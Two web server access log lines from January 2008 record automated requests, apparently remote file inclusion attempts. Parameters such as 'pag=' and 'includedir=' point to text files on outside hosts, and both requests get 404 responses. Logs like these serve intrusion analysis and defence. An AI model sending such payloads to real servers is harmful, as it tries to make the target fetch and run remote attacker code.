210.240.31.1 - - [10/Jan/2008:17:58:54 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:17:59:43 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
